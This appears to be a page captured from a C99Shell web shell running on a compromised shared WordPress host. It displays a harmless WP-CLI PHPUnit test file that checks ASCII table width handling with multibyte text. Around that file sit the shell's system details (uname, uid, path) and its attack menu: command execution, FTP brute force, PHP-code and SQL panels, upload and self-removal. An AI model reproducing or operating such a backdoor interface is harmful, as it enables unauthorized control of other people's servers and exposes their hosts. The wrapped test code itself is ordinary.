!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/local/wp/vendor/wp-cli/php-cli-tools/tests/   drwxr-xr-x
Free 714.93 GB of 879.6 GB (81.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     test-table.php (9.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use cli\Colors, cli\Table, cli\Table\Ascii;
use WP_CLI\Tests\TestCase;

/**
 * Tests for cli\Table
 */
class Test_Table extends TestCase {

    public function test_column_value_too_long_ascii() {

        $constraint_width = 80;

        $table = new cli\Table;
        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );
        $table->setHeaders( array( 'Field', 'Value' ) );
        $table->addRow( array( 'description', 'The 2012 theme for WordPress is a fully responsive theme that looks great on any device. Features include a front page template with its own widgets, an optional display font, styling for post formats on both index and single views, and an optional no-sidebar page template. Make it yours with a custom menu, header image, and background.' ) );
        $table->addRow( array( 'author', '<a href="http://wordpress.org/" title="Visit author homepage">the WordPress team</a>' ) );

        $out = $table->getDisplayLines();
        $this->assertCount( 12, $out );
        $this->assertEquals( $constraint_width, strlen( $out[0] ) );
        $this->assertEquals( $constraint_width, strlen( $out[1] ) );
        $this->assertEquals( $constraint_width, strlen( $out[2] ) );
        $this->assertEquals( $constraint_width, strlen( $out[3] ) );
        $this->assertEquals( $constraint_width, strlen( $out[4] ) );
        $this->assertEquals( $constraint_width, strlen( $out[5] ) );
        $this->assertEquals( $constraint_width, strlen( $out[6] ) );
        $this->assertEquals( $constraint_width, strlen( $out[7] ) );
        $this->assertEquals( $constraint_width, strlen( $out[8] ) );
        $this->assertEquals( $constraint_width, strlen( $out[9] ) );
        $this->assertEquals( $constraint_width, strlen( $out[10] ) );
        $this->assertEquals( $constraint_width, strlen( $out[11] ) );

        $constraint_width = 81;

        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, strlen( $out[ $i ] ) );
        }
    }

    public function test_column_value_too_long_with_multibytes() {

        $constraint_width = 80;

        $table = new cli\Table;
        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );
        $table->setHeaders( array( 'Field', 'Value' ) );
        $table->addRow( array( '1この文章はダミーです。文字の大きさ、量、字間、行間等を確認するために入れています。2この文章はダミーです。文字の大きさ、量、字間、行間等を確認するために入れています。', 'こんにちは' ) );
        $table->addRow( array( 'Lorem Ipsum is simply dummy text of the printing and typesetting industry.', 'Hello' ) );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, \cli\strwidth( $out[$i] ) );
        }

        $constraint_width = 81;

        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, \cli\strwidth( $out[$i] ) );
        }
    }

    public function test_column_odd_single_width_with_double_width() {

        $dummy = new cli\Table;
        $renderer = new cli\Table\Ascii;

        $strip_borders = function ( $a ) {
            return array_map( function ( $v ) {
                return substr( $v, 2, -2 );
            }, $a );
        };

        $renderer->setWidths( array( 10 ) );

        // 1 single-width, 6 double-width, 1 single-width, 2 double-width, 1 half-width, 2 double-width.
        $out = $renderer->row( array( '1あいうえおか2きくカけこ' ) );
        $result = $strip_borders( explode( "\n", $out ) );

        $this->assertSame( 3, count( $result ) );
        $this->assertSame( '1あいうえ ', $result[0] ); // 1 single width, 4 double-width, space = 10.
        $this->assertSame( 'おか2きくカ', $result[1] ); // 2 double-width, 1 single-width, 2 double-width, 1 half-width = 10.
        $this->assertSame( 'けこ      ', $result[2] ); // 2 double-width, 8 spaces = 10.

        // Minimum width 1.

        $renderer->setWidths( array( 1 ) );

        $out = $renderer->row( array( '1あいうえおか2きくカけこ' ) );
        $result = $strip_borders( explode( "\n", $out ) );

        $this->assertSame( 13, count( $result ) );
        // Uneven rows.
        $this->assertSame( '1', $result[0] );
        $this->assertSame( 'あ', $result[1] );

        // Zero width does no wrapping.

        $renderer->setWidths( array( 0 ) );

        $out = $renderer->row( array( '1あいうえおか2きくカけこ' ) );
        $result = $strip_borders( explode( "\n", $out ) );

        $this->assertSame( 1, count( $result ) );
    }

    public function test_column_fullwidth_and_combining() {

        $constraint_width = 80;

        $table = new cli\Table;
        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );
        $table->setHeaders( array( 'Field', 'Value' ) );
        $table->addRow( array( 'ID', 2151 ) );
        $table->addRow( array( 'post_author', 1 ) );
        $table->addRow( array( 'post_title', 'only-english-lorem-ipsum-dolor-sit-amet-consectetur-adipisicing-elit-sed-do-eiusmod-tempor-incididunt-ut-labore' ) );
        $table->addRow( array( 'post_content',
            //'ให้รู้จัก ให้หาหนทางใหม่' .
            '♫ มีอีกหลายต่อหลายคน เขาอดทนก็เพื่อรัก' . "\n" .
            'รักผลักดันให้รู้จัก ให้หาหนทางใหม่' . "\r\n" .
            'ฉันจะล้มตั้งหลายที ดีที่รักมาฉุดไว้' . "\r\n" .
            'รักสร้างสรรค์สิ่งมากมาย และหลอมละลายทุกหัวใจ' . "\r\n" .
            'จะมาร้ายดียังไง แต่ใจก็ยังต้องการ' . "\r\n" .
            'ในทุกๆ วัน โลกหมุนด้วยความรัก ♫' . "\n" .
            'ขอแสดงความยินดี งานแต่งพี่ Earn & Menn' ."\r\n" .
            'เที่ยวปายหน้าร้อน ก็เที่ยวได้เหมือนกันน่ะ' . "\r\n" .
            ' ジョバンニはまっ赤になってうなずきました。けれどもいつかジョバンニの眼のなかには涙がいっぱいになりました。そうだ僕は知っていたのだ、もちろんカムパネルラも知っている。' ."\r\n" .
            'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore' . "\n" .
            ''
        ) );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, \cli\strwidth( $out[$i] ) );
        }

        $constraint_width = 81;

        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, \cli\strwidth( $out[$i] ) );
        }

        $constraint_width = 200;

        $renderer = new cli\Table\Ascii;
        $renderer->setConstraintWidth( $constraint_width );
        $table->setRenderer( $renderer );

        $out = $table->getDisplayLines();
        for ( $i = 0; $i < count( $out ); $i++ ) {
            $this->assertEquals( $constraint_width, \cli\strwidth( $out[$i] ) );
        }
    }

    public function test_ascii_pre_colorized_widths() {

        Colors::enable( true );

        $headers = array( 'package', 'version', 'result' );
        $items = array(
            array( Colors::colorize( '%ygaa/gaa-kabes%n' ), 'dev-master', Colors::colorize( "%rx%n" ) ),
            array( Colors::colorize( '%ygaa/gaa-log%n' ), '*', Colors::colorize( "%gok%n" ) ),
            array( Colors::colorize( '%ygaa/gaa-nonsense%n' ), 'v3.0.11', Colors::colorize( "%rx%n" ) ),
            array( Colors::colorize( '%ygaa/gaa-100%%new%n' ), 'v100%new', Colors::colorize( "%gok%n" ) ),
        );

        // Disable colorization, as `\WP_CLI\Formatter::show_table()` does for Ascii tables.
        Colors::disable( true );
        $this->assertFalse( Colors::shouldColorize() );

        // Account for colorization of columns 0 & 2.

        $table = new Table;
        $renderer = new Ascii;
        $table->setRenderer( $renderer );
        $table->setAsciiPreColorized( array( true, false, true ) );
        $table->setHeaders( $headers );
        $table->setRows( $items );

        $out = $table->getDisplayLines();

        // "+ 4" accommodates 3 borders and header.
        $this->assertSame( 4 + 4, count( $out ) );

        // Borders & header.
        $this->assertSame( 42, strlen( $out[0] ) );
        $this->assertSame( 42, strlen( $out[1] ) );
        $this->assertSame( 42, strlen( $out[2] ) );
        $this->assertSame( 42, strlen( $out[7] ) );

        // Data.
        $this->assertSame( 60, strlen( $out[3] ) );
        $this->assertSame( 60, strlen( $out[4] ) );
        $this->assertSame( 60, strlen( $out[5] ) );
        $this->assertSame( 60, strlen( $out[6] ) );

        // Don't account for colorization of columns 0 & 2.

        $table = new Table;
        $renderer = new Ascii;
        $table->setRenderer( $renderer );
        $table->setHeaders( $headers );
        $table->setRows( $items );

        $out = $table->getDisplayLines();

        // "+ 4" accommodates 3 borders and header.
        $this->assertSame( 4 + 4, count( $out ) );

        // Borders & header.
        $this->assertSame( 56, strlen( $out[0] ) );
        $this->assertSame( 56, strlen( $out[1] ) );
        $this->assertSame( 56, strlen( $out[2] ) );
        $this->assertSame( 56, strlen( $out[7] ) );

        // Data.
        $this->assertSame( 56, strlen( $out[3] ) );
        $this->assertSame( 56, strlen( $out[4] ) );
        $this->assertSame( 56, strlen( $out[5] ) );
        $this->assertSame( 56, strlen( $out[6] ) );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0116 ]--